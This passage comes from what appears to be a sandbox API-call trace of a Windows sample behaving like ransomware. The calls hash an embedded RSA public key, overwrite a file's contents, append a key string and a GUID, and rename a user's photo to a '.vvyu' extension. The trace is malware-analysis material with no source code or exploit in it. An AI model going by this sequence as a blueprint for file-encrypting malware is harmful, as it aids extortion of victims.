KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.325] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.325] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.326] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.327] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.327] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.327] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.327] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.327] GetLastError () returned 0x0 [0192.327] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0192.327] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.327] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.327] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.328] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16b00) returned 0x2af5168 [0192.328] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.329] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6188 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6170 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.332] GetCurrentThreadId () returned 0x5d8 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7218 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.333] GetCurrentThreadId () returned 0x5d8 [0192.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6188 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61e8 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6200 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61a0 [0192.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6170 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0192.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.344] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x16afd, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x16afd, lpOverlapped=0x0) returned 1 [0192.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.345] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16b02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.345] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.346] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.347] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.347] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.347] CloseHandle (hObject=0x584) returned 1 [0192.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0192.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0192.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0192.349] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\hAK2yhq7O.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\hak2yhq7o.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\hAK2yhq7O.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\hak2yhq7o.jpg.vvyu")) returned 1 [0192.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.350] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0192.353] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc051640, ftCreationTime.dwHighDateTime=0x1d89b18, ftLastAccessTime.dwLowDateTime=0xf8da1cc0, 